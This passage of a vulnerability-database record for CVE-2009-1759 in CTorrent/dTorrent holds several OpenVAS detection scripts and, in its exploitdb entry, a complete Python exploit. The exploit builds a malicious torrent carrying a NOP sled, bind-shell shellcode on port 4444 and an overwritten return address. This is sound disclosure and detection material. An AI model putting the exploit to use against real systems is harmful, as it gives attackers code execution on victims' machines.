Use \nsu -c 'yum update ctorrent' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8897\";\ntag_summary = \"The remote host is missing an update to ctorrent\nannounced via advisory FEDORA-2009-8897.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64730\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-1759\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-8897 (ctorrent)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=501813\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"ctorrent\", rpm:\"ctorrent~1.3.4~10.dnh3.3.2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ctorrent-debuginfo\", rpm:\"ctorrent-debuginfo~1.3.4~10.dnh3.3.2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n 
security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-19T10:55:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "description": "The host is installed with CTorrent/Enhanced CTorrent and is\nprone to Buffer Overflow Vulnerability.", "modified": "2017-07-04T00:00:00", "published": "2009-06-01T00:00:00", "id": "OPENVAS:900557", "href": "http://plugins.openvas.org/nasl.php?oid=900557", "type": "openvas", "title": "CTorrent/Enhanced CTorrent Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ctorrent_bof_vuln.nasl 6517 2017-07-04 13:34:20Z cfischer $\n#\n# CTorrent/Enhanced CTorrent Buffer Overflow Vulnerability\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Attackers can exploit this issue by execute arbitrary code via\nspecially crafted torrent files and can cause denial of service.\n\nImpact Level: System/Application \";\n\ntag_affected = \"CTorrent version 1.3.4 on Linux.\nEnhanced CTorrent version 3.3.2 and prior on Linux.\";\n\ntag_insight = \"A stack based buffer overflow is due to a boundary error within\nthe function 'btFiles::BuildFromMI()' in btfiles.cpp while processing torrent\nfiles containing a long path.\";\n\ntag_solution = \"Apply the appropriate patch from the below link,\nhttp://sourceforge.net/p/dtorrent/bugs/14/\nhttp://sourceforge.net/p/dtorrent/code/HEAD/tree\";\n\ntag_summary = \"The host is installed with CTorrent/Enhanced CTorrent and is\nprone to Buffer Overflow Vulnerability.\";\n\nif(description)\n{\n script_id(900557);\n script_version(\"$Revision: 6517 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-04 15:34:20 +0200 (Tue, 04 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-01 09:35:57 +0200 (Mon, 01 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-1759\");\n script_bugtraq_id(34584);\n script_name(\"CTorrent/Enhanced CTorrent Buffer Overflow Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/34752\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8470\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/49959\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n 
script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_ctorrent_detect.nasl\");\n script_mandatory_keys(\"CTorrent/CTorrent_or_Enhanced/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nctorrentVer = get_kb_item(\"CTorrent/Ver\");\nif(ctorrentVer != NULL)\n{\n if(version_is_equal(version:ctorrentVer, test_version:\"1.3.4\"))\n {\n security_message(0);\n exit(0);\n }\n}\n\nectorrentVer = get_kb_item(\"Enhanced/CTorrent/Ver\");\nif(ectorrentVer != NULL)\n{\n if(version_is_less_equal(version:ectorrentVer, test_version:\"3.3.2\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "description": "The remote host is missing an update to ctorrent\nannounced via advisory DSA 1817-1.", "modified": "2017-07-07T00:00:00", "published": "2009-06-23T00:00:00", "id": "OPENVAS:64252", "href": "http://plugins.openvas.org/nasl.php?oid=64252", "type": "openvas", "title": "Debian Security Advisory DSA 1817-1 (ctorrent)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1817_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1817-1 (ctorrent)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Michael Brooks discovered that ctorrent, a text-mode bittorrent client,\ndoes not verify the length of file paths in torrent files. 
An attacker\ncan exploit this via a crafted torrent that contains a long file path to\nexecute arbitrary code with the rights of the user opening the file.\n\n\nThe oldstable distribution (etch) does not contain ctorrent.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 1.3.4-dnh3.2-1+lenny1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.3.4-dnh3.2-1.1.\n\n\nWe recommend that you upgrade your ctorrent packages.\";\ntag_summary = \"The remote host is missing an update to ctorrent\nannounced via advisory DSA 1817-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201817-1\";\n\n\nif(description)\n{\n script_id(64252);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-23 15:49:15 +0200 (Tue, 23 Jun 2009)\");\n script_cve_id(\"CVE-2009-1759\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1817-1 (ctorrent)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"ctorrent\", ver:\"1.3.4-dnh3.2-1+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-12-21T00:00:00", "published": "2009-11-11T00:00:00", "id": "OPENVAS:66158", "href": "http://plugins.openvas.org/nasl.php?oid=66158", "type": "openvas", "title": "FreeBSD Ports: ctorrent", "sourceData": "#\n#VID 83d7d149-b965-11de-a515-0022156e8794\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 83d7d149-b965-11de-a515-0022156e8794\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: ctorrent\n\nCVE-2009-1759\nStack-based buffer overflow in the btFiles::BuildFromMI function\n(trunk/btfiles.cpp) in Enhanced CTorrent (aka dTorrent) 3.3.2 and\nprobably earlier, and CTorrent 1.3.4, allows remote attackers to cause\na denial of service (crash) and possibly execute arbitrary code via a\nTorrent file containing a long path.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://sourceforge.net/tracker/?func=detail&aid=2782875&group_id=202532&atid=981959\nhttp://www.vuxml.org/freebsd/83d7d149-b965-11de-a515-0022156e8794.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(66158);\n script_version(\"$Revision: 4824 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-21 09:49:38 +0100 (Wed, 21 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-1759\");\n script_bugtraq_id(34584);\n script_tag(name:\"cvss_base\", 
value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: ctorrent\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"ctorrent\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.3.2_2\")<0) {\n txt += 'Package ctorrent version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "description": "The remote host is missing an update to ctorrent\nannounced via advisory DSA 1817-1.", "modified": "2018-04-06T00:00:00", "published": "2009-06-23T00:00:00", "id": "OPENVAS:136141256231064252", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064252", "type": "openvas", "title": "Debian Security Advisory DSA 1817-1 (ctorrent)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1817_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1817-1 (ctorrent)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Michael Brooks discovered that ctorrent, a text-mode bittorrent client,\ndoes not verify the length of file paths in torrent files. 
An attacker\ncan exploit this via a crafted torrent that contains a long file path to\nexecute arbitrary code with the rights of the user opening the file.\n\n\nThe oldstable distribution (etch) does not contain ctorrent.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 1.3.4-dnh3.2-1+lenny1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.3.4-dnh3.2-1.1.\n\n\nWe recommend that you upgrade your ctorrent packages.\";\ntag_summary = \"The remote host is missing an update to ctorrent\nannounced via advisory DSA 1817-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201817-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64252\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-23 15:49:15 +0200 (Tue, 23 Jun 2009)\");\n script_cve_id(\"CVE-2009-1759\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1817-1 (ctorrent)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"ctorrent\", ver:\"1.3.4-dnh3.2-1+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "description": "The remote host is missing an update to ctorrent\nannounced via advisory FEDORA-2009-8897.", "modified": "2017-07-10T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:64730", "href": "http://plugins.openvas.org/nasl.php?oid=64730", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-8897 (ctorrent)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8897.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8897 (ctorrent)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nSecurity update, fixes a stack-based buffer overflow (CVE-2009-1759).\n\nChangeLog:\n\n* Fri Aug 21 2009 Dominik 'Rathann' Mierzejewski 1.3.4-10.dnh3.3.2\n- fixed stack-based buffer overflow (CVE-2009-1759, RHBZ #501813)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update ctorrent' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8897\";\ntag_summary = \"The remote host is missing an update to ctorrent\nannounced via advisory FEDORA-2009-8897.\";\n\n\n\nif(description)\n{\n script_id(64730);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-1759\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-8897 (ctorrent)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=501813\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"ctorrent\", rpm:\"ctorrent~1.3.4~10.dnh3.3.2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ctorrent-debuginfo\", rpm:\"ctorrent-debuginfo~1.3.4~10.dnh3.3.2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n 
security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T07:26:40", "description": "cTorrent/DTorrent (.Torrent File) Buffer Overflow Exploit. CVE-2009-1759. Local exploit for linux platform", "published": "2009-04-17T00:00:00", "type": "exploitdb", "title": "cTorrent/DTorrent - .Torrent Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1759"], "modified": "2009-04-17T00:00:00", "id": "EDB-ID:8470", "href": "https://www.exploit-db.com/exploits/8470/", "sourceData": "#!/usr/bin/python\n\n#Written By Michael Brooks\n#04/17/2009\n\n#Stack Based Buffer Overflow \n#The vulnerability is in the btFiles::BuildFromMI function \n#inside the btfiles.cpp file\n\n#Exploit tested on cTorrent 1.3.4 using Debian Sarge using Linux kernel 2.4.27-3-386\n#Can't get the exploit working on a modern linux kernel because of ASLR\n\n#code is using python 2.5\n\n#Home page for cTorrent 1.3.4:\n#http://sourceforge.net/projects/ctorrent/ 161,000+ Downloads\n#dTorrent 3.3.2 is also vulnerable: \n#http://sourceforge.net/projects/dtorrent/ 18,000+ downloads\n\nimport sys\nimport os\n#This code will take any torrent file and turn it into an exploit. 
\nUSAGE=\"python exploit.py in_file.torrent out_file.torrent\"\n\ndef main():\n #Start of the program\n bfile=fileio()\n try:\n bad_torrent=bfile.read_bencode(sys.argv[1])\n except:\n print USAGE\n sys.exit()\n \n exploit_str=create_exploit()\n print(\"Writing Bytes:\"+str(len(exploit_str)))\n bad_torrent[\"info\"][\"files\"][0][\"path\"][0]=exploit_str\n try:\n bfile.write_bencode(sys.argv[2], bad_torrent)\n except:\n print USAGE\n sys.exit()\n\ndef create_exploit():\n # linux_ia32_bind - LPORT=4444 Size=108 Encoder=PexFnstenvSub http://metasploit.com\n shellcode = \"\\x2b\\xc9\\x83\\xe9\\xeb\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x27\"\n shellcode += \"\\x1a\\xbe\\x4e\\x83\\xeb\\xfc\\xe2\\xf4\\x16\\xc1\\xed\\x0d\\x74\\x70\\xbc\\x24\"\n shellcode += \"\\x41\\x42\\x27\\xc7\\xc6\\xd7\\x3e\\xd8\\x64\\x48\\xd8\\x26\\x36\\x46\\xd8\\x1d\"\n shellcode += \"\\xae\\xfb\\xd4\\x28\\x7f\\x4a\\xef\\x18\\xae\\xfb\\x73\\xce\\x97\\x7c\\x6f\\xad\"\n shellcode += \"\\xea\\x9a\\xec\\x1c\\x71\\x59\\x37\\xaf\\x97\\x7c\\x73\\xce\\xb4\\x70\\xbc\\x17\"\n shellcode += \"\\x97\\x25\\x73\\xce\\x6e\\x63\\x47\\xfe\\x2c\\x48\\xd6\\x61\\x08\\x69\\xd6\\x26\"\n shellcode += \"\\x08\\x78\\xd7\\x20\\xae\\xf9\\xec\\x1d\\xae\\xfb\\x73\\xce\"\n \n #The exact address of our buffer is 0xbffffccc, which ebx tells us\n #however memeory changes before we control the eip, \n #so we change the addr to hit the NOP sled\n eip=\"\\x11\\xf1\\xff\\xbf\"\n #eip=\"\\xcc\\xfc\\xff\\xbf\"#the add ebx is holding\n \n #this is a dummy address to satisfy other pointer before we return\n #this cannot be the EIP becuase this location is written to!\n dumb_addr=\"\\xcc\\xfc\\xff\\xbf\"\n \n #nop sled\n long_str=\"\\x90\"*(4028-len(shellcode))\n #memory around the shellcode is written to, but this is a safe place\n long_str+=shellcode\n #this 100byte buffer is written to before we control the eip\n long_str+=\"\\x90\"*100\n long_str+=eip#4128 bytes is the EIP!\n \n #This pointer must be real becuase it is 
written to in btFiles::BuildFromMI\n long_str+=dumb_addr#\"this\" \n #We can control these addresses but we don't need them\n #long_str+=dumb_addr#\"metabuf\"\n #long_str+=dumb_addr#\"saveas\"\n return long_str\n \n#Start of functions for bencoding:\ndef BTFailure(msg):\n pass\n\ndef decode_int(x, f):\n f += 1\n newf = x.index('e', f)\n n = int(x[f:newf])\n if x[f] == '-':\n if x[f + 1] == '0':\n raise ValueError\n elif x[f] == '0' and newf != f+1:\n raise ValueError\n return (n, newf+1)\n\ndef decode_string(x, f):\n colon = x.index(':', f)\n n = int(x[f:colon])\n if x[f] == '0' and colon != f+1:\n raise ValueError\n colon += 1\n return (x[colon:colon+n], colon+n)\n\ndef decode_list(x, f):\n r, f = [], f+1\n while x[f] != 'e':\n v, f = decode_func[x[f]](x, f)\n r.append(v)\n return (r, f + 1)\n\ndef decode_dict(x, f):\n r, f = {}, f+1\n while x[f] != 'e':\n k, f = decode_string(x, f)\n r[k], f = decode_func[x[f]](x, f)\n return (r, f + 1)\n\ndecode_func = {}\ndecode_func['l'] = decode_list\ndecode_func['d'] = decode_dict\ndecode_func['i'] = decode_int\ndecode_func['0'] = decode_string\ndecode_func['1'] = decode_string\ndecode_func['2'] = decode_string\ndecode_func['3'] = decode_string\ndecode_func['4'] = decode_string\ndecode_func['5'] = decode_string\ndecode_func['6'] = decode_string\ndecode_func['7'] = decode_string\ndecode_func['8'] = decode_string\ndecode_func['9'] = decode_string\n\ndef bdecode(x):\n try:\n r, l = decode_func[x[0]](x, 0)\n except (IndexError, KeyError, ValueError):\n raise BTFailure(\"not a valid bencoded string\")\n if l != len(x):\n raise BTFailure(\"invalid bencoded value (data after valid prefix)\")\n return r\n\nfrom types import StringType, IntType, LongType, DictType, ListType, TupleType\n\n\nclass Bencached(object):\n\n __slots__ = ['bencoded']\n\n def __init__(self, s):\n self.bencoded = s\n\ndef encode_bencached(x,r):\n r.append(x.bencoded)\n\ndef encode_int(x, r):\n r.extend(('i', str(x), 'e'))\n\ndef encode_bool(x, r):\n if x:\n 
encode_int(1, r)\n else:\n encode_int(0, r)\n \ndef encode_string(x, r):\n r.extend((str(len(x)), ':', x))\n\ndef encode_list(x, r):\n r.append('l')\n for i in x:\n encode_func[type(i)](i, r)\n r.append('e')\n\ndef encode_dict(x,r):\n r.append('d')\n ilist = x.items()\n ilist.sort()\n for k, v in ilist:\n r.extend((str(len(k)), ':', k))\n encode_func[type(v)](v, r)\n r.append('e')\n\nencode_func = {}\nencode_func[Bencached] = encode_bencached\nencode_func[IntType] = encode_int\nencode_func[LongType] = encode_int\nencode_func[StringType] = encode_string\nencode_func[ListType] = encode_list\nencode_func[TupleType] = encode_list\nencode_func[DictType] = encode_dict\n\ntry:\n from types import BooleanType\n encode_func[BooleanType] = encode_bool\nexcept ImportError:\n pass\n\ndef bencode(x):\n r = []\n encode_func[type(x)](x, r)\n return ''.join(r)\n\nclass fileio:\n def read_bencode(self,file):\n infile = open(file,\"r\")\n file=infile.read()\n infile.close\n return bdecode(file)\n \n #writes a dictionary to a bencoded file\n def write_bencode(self,file,dict):\n outfile = open(file, 'wb')\n outfile.write(bencode(dict))\n outfile.close() \n \n#execute main\nmain()\n\n# milw0rm.com [2009-04-17]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/8470/"}], "debian": [{"lastseen": "2019-05-30T02:22:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1759"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA-1817-1 security@debian.org\nhttp://www.debian.org/security/ Nico Golde\nJune 17th, 2009 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : ctorrent\nVulnerability : stack-based buffer overflow\nProblem type : local (remote)\nDebian-specific: 